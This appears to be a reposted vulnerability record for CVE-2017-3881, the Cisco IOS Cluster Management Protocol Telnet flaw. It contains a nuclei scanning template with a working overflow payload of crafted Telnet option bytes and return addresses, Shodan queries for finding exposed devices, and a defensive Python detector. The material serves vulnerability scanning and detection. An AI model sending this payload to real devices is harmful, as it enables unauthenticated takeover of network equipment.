Cisco IOS Remote Code Execution Vulnerability

Vulnerability Information

Vulnerability name: Cisco IOS Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2017-3881

Vulnerability type: Command execution

Severity: Critical

Description: This vulnerability exists in the Cisco Cluster Management Protocol (CMP) processing code of Cisco IOS and Cisco IOS XE Software and allows an unauthenticated remote attacker to cause a reload of an affected device or to remotely execute code with elevated privileges. The Cluster Management Protocol uses Telnet internally as the signaling and command protocol between cluster members. The vulnerability is caused by two factors: (1) the failure to restrict CMP-specific Telnet options to internal, local communication between cluster members, such options instead being accepted and processed on any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device that is configured to accept Telnet connections. Successful exploitation could allow the attacker to execute arbitrary code and take full control of the device, or to cause a reload of the affected device. Affected devices include Catalyst switches, Embedded Service 2020 switches, the Enhanced Layer 2 EtherSwitch Service Module, the Enhanced Layer 2/3 EtherSwitch Service Module, the Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, the ME 4924-10GE switch, RF Gateway 10 and the SM-X Layer 2/3 EtherSwitch Service Module. The impact of this vulnerability is extremely severe, because it allows an unauthenticated remote attacker to take full control of an affected device, which may lead to data leakage, service disruption or other malicious activity.

Vendor: Cisco

Product: Cisco IOS

Affected version: 12.2(55)SE11

Search syntax: product:"cisco ios http config", cpe:"cpe:2.3:o:cisco:ios"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2017%2FCVE-2017-3881.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2017-3881

info:
  name: Cisco IOS 12.2(55)SE11 - Remote Code Execution
  author: dwisiswant0, NaN@korelogic
  severity: critical
  description: |
    A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access.
  reference:
    - https://github.com/artkond/cisco-rce
    - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3881
    - http://www.securitytracker.com/id/1038059
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-3881
    cwe-id: CWE-20
    epss-score: 0.94083
    epss-percentile: 0.99893
    cpe: cpe:2.3:o:cisco:ios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query:
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve2017,network,cve,cisco,rce,kev,msf,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"

    inputs:
      - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
        read: 1024

      - data: "show priv"
        read: 1024
    read-size: 1024
    matchers:
      - type: word
        words:
          - "Current privilege level is"
# digest: 4a0a00473045022027a392a3f4ae6ca700335ac106802070aee5a351ac084b511a6b865f66cc8753022100fc349039457c6ed1a9b9cb834b5a7e1e2db0d01de5e9930bee77a966ef1a009b:922c64590222798bb761d5b6d8e72950
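The description above blames factor (1), CMP-specific Telnet options being accepted on any Telnet connection, and the template's first input shows their shape: IAC SB 0x24 (the fffa24 prefix), a CISCO_KITS marker, long filler and a trailing IAC SE. As an added example that is not part of the nuclei template or the original page, the Python below inspects a raw Telnet byte stream for option-0x24 subnegotiations and reports the conditions a defender would alert on; the sample streams and the 64-byte size threshold are constructed here, not Cisco values.

```python
# Added example: detection-side inspection of a Telnet stream for Cisco CMP
# subnegotiations (Telnet option 0x24, the "fffa24" prefix in the template).
IAC, SB, SE = 0xFF, 0xFA, 0xF0
CMP_OPTION = 0x24            # option byte that follows IAC SB in the CMP payload
MAX_SUBOPTION_LEN = 64       # constructed alert threshold, not a Cisco value


def telnet_subnegotiations(stream: bytes):
    """Return [(option, payload)] for every IAC SB <opt> ... IAC SE sequence.

    Doubled-IAC escapes inside a payload are not unescaped; that is enough
    for the payload shape shown on this page."""
    result, pos = [], 0
    while True:
        start = stream.find(bytes([IAC, SB]), pos)
        if start < 0 or start + 2 >= len(stream):
            break
        end = stream.find(bytes([IAC, SE]), start + 3)
        if end < 0:
            break                                # unterminated: stop scanning
        result.append((stream[start + 2], stream[start + 3:end]))
        pos = end + 2
    return result


def cmp_findings(stream: bytes, peer_is_cluster_member: bool = False):
    """List findings for CMP subnegotiations seen in the stream."""
    findings = []
    for option, payload in telnet_subnegotiations(stream):
        if option != CMP_OPTION:
            continue
        if not peer_is_cluster_member:
            findings.append("CMP option 0x24 from a non-cluster peer")
        if len(payload) > MAX_SUBOPTION_LEN:
            findings.append(f"oversized CMP suboption ({len(payload)} bytes)")
    return findings


# Constructed samples: an ordinary DO TERMINAL-TYPE negotiation, and the same
# negotiation followed by a CMP suboption shaped like the template's first input.
BENIGN = bytes([IAC, 0xFD, 0x18])
SUSPECT = (BENIGN + bytes([IAC, SB, CMP_OPTION, 0x00, 0x03]) + b"CISCO_KITS\x01"
           + b"2:" + b"A" * 120 + b":15:" + bytes([IAC, SE]))

if __name__ == "__main__":
    print(cmp_findings(BENIGN))     # []
    print(cmp_findings(SUSPECT))    # two findings
```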


http://example.com/2025/07/06/github_943777533/
Author: lianccc
Published: July 6, 2025